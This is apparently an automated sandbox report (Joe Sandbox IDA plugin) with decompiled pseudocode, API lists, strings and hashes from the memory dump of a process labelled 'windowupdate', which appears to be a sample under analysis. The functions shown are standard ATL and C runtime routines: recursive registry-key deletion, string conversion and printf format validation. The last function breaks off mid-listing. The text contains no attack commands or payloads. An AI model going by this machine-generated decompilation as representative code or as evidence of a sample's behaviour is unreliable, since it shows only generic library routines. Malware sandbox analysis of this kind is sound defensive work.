                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::getString
                      • String ID: `template-parameter$void
                      • API String ID: 1028460119-4057429177
                      • Opcode ID: d25dcaada55358150cc57389d7cda0dde32404432d70fdc4cb53cf3275b5dea0
                      • Instruction ID: 6588cc5b868a44eab6bb1996570b9063a38770980fabd382e763e4886696158d
                      • Opcode Fuzzy Hash: d25dcaada55358150cc57389d7cda0dde32404432d70fdc4cb53cf3275b5dea0
                      • Instruction Fuzzy Hash: FC411271D00108EFDF14DF94D852AEE7BB5EF48305F148129F916A7251EB31AA09DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34A80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 91%
                      			E00D34A80(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				void* _v28;
				void* _v36;
				struct _FILETIME _v48;
				int _v60;
				char _v324;
				char _v336;
				void* _v340;
				void* _v344;
				void* _v348;
				signed int _t45;
				long _t52;
				void* _t57;
				void* _t59;
				void* _t67;
				intOrPtr* _t74;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				signed int _t103;
				void* _t104;
				void* _t105;

				_t102 = __esi;
				_t70 = __ebx;
				_push(__ecx);
				_t100 =  &_v348;
				memset(_t100, 0xcccccccc, 0x56 << 2);
				_t105 = _t104 + 0xc;
				_t101 = _t100 + 0x56;
				_pop(_t74);
				_t45 =  *0xdf600c; // 0x71e60372
				_v8 = _t45 ^ _t103;
				_v12 = _t74;
				E00D341C0( &_v28, 0);
				_v36 = E00D345F0( &_v28, __esi,  *_v12, _a4,  *(_v12 + 4) | 0x0002001f);
				if(_v36 == 0) {
					_v60 = 0x100;
					while(1) {
						_t102 = _t105;
						_t96 = _v28;
						_t52 = RegEnumKeyExA(_t96, 0,  &_v324,  &_v60, 0, 0, 0,  &_v48);
						__eflags = _t105 - _t105;
						__eflags = E00DC1520(_t52, _t105 - _t105);
						if(__eflags != 0) {
							break;
						}
						_v36 = E00D34A80(_t70,  &_v28, _t101, _t102, __eflags,  &_v324);
						__eflags = _v36;
						if(__eflags == 0) {
							_v60 = 0x100;
							continue;
						}
						_v344 = _v36;
						E00D34220( &_v28, __eflags);
						_t57 = _v344;
						L11:
						E00DC14C0(_t103, 0xd34c08);
						_t59 = _t57;
						_t98 = _t96;
						return E00DC1520(E00D47280(_t59, _t70, _v8 ^ _t103, _t98, _t101, _t102), _t103 - _t105 + 0x158);
					}
					E00D34420( &_v28, _t102);
					_t96 = _a4;
					_v348 = E00D34310(_v12, _t102, _t96);
					E00D34220( &_v28, __eflags);
					_t57 = _v348;
					goto L11;
				}
				if(_v36 != 2) {
					_t110 = _v36 - 3;
					if(_v36 != 3) {
						_t96 = _v36;
						_push(_t96);
						_t67 = E00D3F200(0xf237b8);
						E00D323E0(__ebx, _t101, __esi, _t110, E00D323B0( &_v336, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x18c9), _t67, 0, "CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)\n", _a4);
						_t105 = _t105 + 0x18;
					}
				}
				_v340 = _v36;
				E00D34220( &_v28, _t110);
				_t57 = _v340;
				goto L11;
			}



























                      0x00d34a80
                      0x00d34a80
                      0x00d34a8b
                      0x00d34a8c
                      0x00d34a9c
                      0x00d34a9c
                      0x00d34a9c
                      0x00d34a9e
                      0x00d34a9f
                      0x00d34aa6
                      0x00d34aa9
                      0x00d34ab1
                      0x00d34ad5
                      0x00d34adc
                      0x00d34b3e
                      0x00d34b45
                      0x00d34b45
                      0x00d34b5e
                      0x00d34b62
                      0x00d34b68
                      0x00d34b6f
                      0x00d34b71
                      0x00000000
                      0x00000000
                      0x00d34b82
                      0x00d34b85
                      0x00d34b89
                      0x00d34ba4
                      0x00000000
                      0x00d34ba4
                      0x00d34b8e
                      0x00d34b97
                      0x00d34b9c
                      0x00d34bd5
                      0x00d34bdf
                      0x00d34be4
                      0x00d34be5
                      0x00d34c02
                      0x00d34c02
                      0x00d34bb0
                      0x00d34bb5
                      0x00d34bc1
                      0x00d34bca
                      0x00d34bcf
                      0x00000000
                      0x00d34bcf
                      0x00d34ae2
                      0x00d34ae4
                      0x00d34ae8
                      0x00d34aea
                      0x00d34aed
                      0x00d34afe
                      0x00d34b1a
                      0x00d34b1f
                      0x00d34b1f
                      0x00d34ae8
                      0x00d34b25
                      0x00d34b2e
                      0x00d34b33
                      0x00000000

                      APIs
                        • Part of subcall function 00D345F0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D346FE
                      • _Smanip.LIBCPMTD ref: 00D34B14
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      • ~Module.VCCORLIBD ref: 00D34B2E
                      • RegEnumKeyExA.ADVAPI32 ref: 00D34B62
                      • ~Module.VCCORLIBD ref: 00D34B97
                      • ~Module.VCCORLIBD ref: 00D34BCA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D34BDF
                      Strings
                      • CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d), xrefs: 00D34AF2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34B09
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$EnumSmanip
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)
                      • API String ID: 2188485312-3584847366
                      • Opcode ID: 686315aa1c85192f9548b5241f84cbb886c55a7940064ade682be1a46a922141
                      • Instruction ID: 42e401393dae2397fc25e119b93f861fa0b861a5efabab03a5659c93faa34393
                      • Opcode Fuzzy Hash: 686315aa1c85192f9548b5241f84cbb886c55a7940064ade682be1a46a922141
                      • Instruction Fuzzy Hash: 8B410175900218EBDB54EF94DC96FEEB774EF88301F004159E505BB291DB78A984CBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D449E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00D449E0(short* __edx, void* __edi, void* __esi, char* _a4, int _a8) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v28;
				void _v36;
				int _v40;
				int _v44;
				short* _v48;
				int _v52;
				void _v56;
				int _t43;
				void* _t45;
				int _t50;
				int _t58;
				int _t73;
				short* _t74;
				void* _t87;
				void* _t88;
				void* _t89;

				_t74 = __edx;
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t89 = _t88 + 0xc;
				if(_a4 == 0 || _a8 == 0) {
					_t43 = 0;
					goto L12;
				} else {
					_v8 = 0;
					_v12 = E00D31AB0();
					_v16 = 0;
					_v20 = 0;
					E00D3F2E0( &_v28);
					_v36 = 0;
					_t50 = MultiByteToWideChar(_v12, 0, _a4, _a8, 0, 0);
					__eflags = _t89 - _t89;
					_v40 = E00DC1520(_t50, _t89 - _t89);
					_t52 = _v40;
					_v44 = _v40;
					__eflags = _a8 - 0xffffffff;
					if(_a8 == 0xffffffff) {
						_t73 = _v44 - 1;
						__eflags = _t73;
						_v44 = _t73;
					}
					_t74 = _v44;
					__imp__#4(0, _t74);
					__eflags = _t89 - _t89;
					_v36 = E00DC1520(_t52, _t89 - _t89);
					__eflags = _v36;
					if(_v36 == 0) {
						L11:
						_v56 = _v36;
						E00D3F220( &_v28);
						_t43 = _v56;
						goto L12;
					} else {
						_t58 = MultiByteToWideChar(_v12, 0, _a4, _a8, _v36, _v40);
						__eflags = _t89 - _t89;
						_v48 = E00DC1520(_t58, _t89 - _t89);
						_t74 = _v48;
						__eflags = _t74 - _v40;
						if(__eflags != 0) {
							_t59 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x482, 0, "%ls", L"nResult == nConvertedLen");
							_t89 = _t89 + 0x18;
							__eflags = _t59 - 1;
							if(_t59 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48 - _v40;
						if(_v48 == _v40) {
							goto L11;
						} else {
							_t74 = _v36;
							__imp__#6(_t74);
							__eflags = _t89 - _t89;
							E00DC1520(_t59, _t89 - _t89);
							_v52 = 0;
							E00D3F220( &_v28);
							_t43 = _v52;
							L12:
							_push(_t74);
							E00DC14C0(_t87, 0xd44b48);
							_t45 = _t43;
							return E00DC1520(_t45, _t87 - _t89 + 0x34);
						}
					}
				}
			}























                      0x00d449e0
                      0x00d449f5
                      0x00d449f5
                      0x00d449fb
                      0x00d44a03
                      0x00000000
                      0x00d44a0a
                      0x00d44a0a
                      0x00d44a16
                      0x00d44a19
                      0x00d44a20
                      0x00d44a2a
                      0x00d44a2f
                      0x00d44a4a
                      0x00d44a50
                      0x00d44a57
                      0x00d44a5a
                      0x00d44a5d
                      0x00d44a60
                      0x00d44a64
                      0x00d44a69
                      0x00d44a69
                      0x00d44a6c
                      0x00d44a6c
                      0x00d44a71
                      0x00d44a77
                      0x00d44a7d
                      0x00d44a84
                      0x00d44a87
                      0x00d44a8b
                      0x00d44b16
                      0x00d44b19
                      0x00d44b1f
                      0x00d44b24
                      0x00000000
                      0x00d44a91
                      0x00d44aa9
                      0x00d44aaf
                      0x00d44ab6
                      0x00d44ab9
                      0x00d44abc
                      0x00d44abf
                      0x00d44ad9
                      0x00d44ade
                      0x00d44ae1
                      0x00d44ae4
                      0x00d44ae6
                      0x00d44ae6
                      0x00d44ae4
                      0x00d44aea
                      0x00d44aed
                      0x00000000
                      0x00d44aef
                      0x00d44af1
                      0x00d44af5
                      0x00d44afb
                      0x00d44afd
                      0x00d44b02
                      0x00d44b0c
                      0x00d44b11
                      0x00d44b27
                      0x00d44b27
                      0x00d44b31
                      0x00d44b36
                      0x00d44b47
                      0x00d44b47
                      0x00d44aed
                      0x00d44a8b

                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D44A4A
                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00D44A77
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?), ref: 00D44AA9
                      • SysFreeString.OLEAUT32(00000000), ref: 00D44AF5
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D44B31
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h, xrefs: 00D44AD2
                      • nResult == nConvertedLen, xrefs: 00D44AC1
                      • %ls, xrefs: 00D44AC6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiStringWide$AllocCheckFreeStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$nResult == nConvertedLen
                      • API String ID: 2571081082-1767654226
                      • Opcode ID: e5d58c7a4c8913a0d3f44192edd9617f0a188a0efa38d304fdf6eacd6dd63165
                      • Instruction ID: fba644ad3ffbc305f55fd3039595c9159c0de2e2dfb21a7a26277695c0d474f7
                      • Opcode Fuzzy Hash: e5d58c7a4c8913a0d3f44192edd9617f0a188a0efa38d304fdf6eacd6dd63165
                      • Instruction Fuzzy Hash: BA415976E00219AFCB10EF98D886FEEBBB5EB48350F148118E515BB281D7749D80CBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D80130 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00D80130(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E00D7FDB0(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xff458800
						_t13 = ( *_t10 << 4) + 0x474; // 0xd6b1da
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M00D802B8))) {
								case 0:
									E00D64910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00D64B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00D64AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00D64B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x00d80138
                      0x00d80148
                      0x00d80151
                      0x00d80154
                      0x00d8015b
                      0x00d80169
                      0x00000000
                      0x00d80169
                      0x00d8015d
                      0x00d80160
                      0x00d80167
                      0x00d80178
                      0x00d8017e
                      0x00d8018a
                      0x00d80191
                      0x00d80197
                      0x00d801a5
                      0x00d801a8
                      0x00d801ab
                      0x00000000
                      0x00000000
                      0x00d801b7
                      0x00d801ba
                      0x00d801c2
                      0x00d801cb
                      0x00d801ce
                      0x00d801d2
                      0x00d80231
                      0x00d80233
                      0x00d8023e
                      0x00d80235
                      0x00d80235
                      0x00d80235
                      0x00d80248
                      0x00d8024b
                      0x00d8024f
                      0x00d80269
                      0x00d8026e
                      0x00d80271
                      0x00d80274
                      0x00d80276
                      0x00d80276
                      0x00d80274
                      0x00d80277
                      0x00d8027b
                      0x00d802aa
                      0x00d8019f
                      0x00d8019f
                      0x00d801a2
                      0x00000000
                      0x00d8027d
                      0x00d80282
                      0x00d8029e
                      0x00000000
                      0x00d802a6
                      0x00d8027b
                      0x00d801d7
                      0x00000000
                      0x00d801e5
                      0x00d801ea
                      0x00000000
                      0x00000000
                      0x00d801f5
                      0x00d801f9
                      0x00000000
                      0x00000000
                      0x00d80209
                      0x00d8020d
                      0x00000000
                      0x00000000
                      0x00d8021d
                      0x00d80229
                      0x00d8022c
                      0x00000000
                      0x00000000
                      0x00d801d7
                      0x00000000
                      0x00d802af
                      0x00000000
                      0x00d80167
                      0x00000000

                      Strings
                      • ("Missing position in the format string", 0), xrefs: 00D80251, 00D80299
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st, xrefs: 00D80294
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D80262, 00D8028F
                      • %ls, xrefs: 00D80256
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-4110031974
                      • Opcode ID: 3d3f0efec0e3d279df4f3bec93d93e2c3c1db8ef92c2d2c4542ccbfb86a4855a
                      • Instruction ID: a4278949352f5420c1065983bb9bc09a8e3906408ea46a7cb2e904f746e841a4
                      • Opcode Fuzzy Hash: 3d3f0efec0e3d279df4f3bec93d93e2c3c1db8ef92c2d2c4542ccbfb86a4855a
                      • Instruction Fuzzy Hash: 914181B0E00209EFDB44EF94C959BAEBB71AF45304F2441A8D0456B346D771DE09DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D802D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00D802D0(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E00D7FE50(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xb60fff45
						_t13 = ( *_t10 << 4) + 0x474; // 0xd6b9ec
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M00D80458))) {
								case 0:
									E00D64910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00D64B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00D64AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00D64B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x00d802d8
                      0x00d802e8
                      0x00d802f1
                      0x00d802f4
                      0x00d802fb
                      0x00d80309
                      0x00000000
                      0x00d80309
                      0x00d802fd
                      0x00d80300
                      0x00d80307
                      0x00d80318
                      0x00d8031e
                      0x00d8032a
                      0x00d80331
                      0x00d80337
                      0x00d80345
                      0x00d80348
                      0x00d8034b
                      0x00000000
                      0x00000000
                      0x00d80357
                      0x00d8035a
                      0x00d80362
                      0x00d8036b
                      0x00d8036e
                      0x00d80372
                      0x00d803d1
                      0x00d803d3
                      0x00d803de
                      0x00d803d5
                      0x00d803d5
                      0x00d803d5
                      0x00d803e8
                      0x00d803eb
                      0x00d803ef
                      0x00d80409
                      0x00d8040e
                      0x00d80411
                      0x00d80414
                      0x00d80416
                      0x00d80416
                      0x00d80414
                      0x00d80417
                      0x00d8041b
                      0x00d8044a
                      0x00d8033f
                      0x00d8033f
                      0x00d80342
                      0x00000000
                      0x00d8041d
                      0x00d80422
                      0x00d8043e
                      0x00000000
                      0x00d80446
                      0x00d8041b
                      0x00d80377
                      0x00000000
                      0x00d80385
                      0x00d8038a
                      0x00000000
                      0x00000000
                      0x00d80395
                      0x00d80399
                      0x00000000
                      0x00000000
                      0x00d803a9
                      0x00d803ad
                      0x00000000
                      0x00000000
                      0x00d803bd
                      0x00d803c9
                      0x00d803cc
                      0x00000000
                      0x00000000
                      0x00d80377
                      0x00000000
                      0x00d8044f
                      0x00000000
                      0x00d80307
                      0x00000000

                      Strings
                      • ("Missing position in the format string", 0), xrefs: 00D803F1, 00D80439
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00D80434
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D80402, 00D8042F
                      • %ls, xrefs: 00D803F6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-208977200
                      • Opcode ID: ec2b4242086fd08684e968930797ea86bfde4ffd196228ab32a03b30697ed91e
                      • Instruction ID: 8116f13317136c1b7608752d4bb42001ad9229a918041608213012ecbda49b5f
                      • Opcode Fuzzy Hash: ec2b4242086fd08684e968930797ea86bfde4ffd196228ab32a03b30697ed91e
                      • Instruction Fuzzy Hash: 154171B0E44209EFCB54EF98D942BAEBB71AF41304F2441A8E50567342D771EE09DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D80470 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00D80470(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E00D7FEF0(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xd6c80f
						_t13 = ( *_t10 << 4) + 0x474; // 0xd6c1fc
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
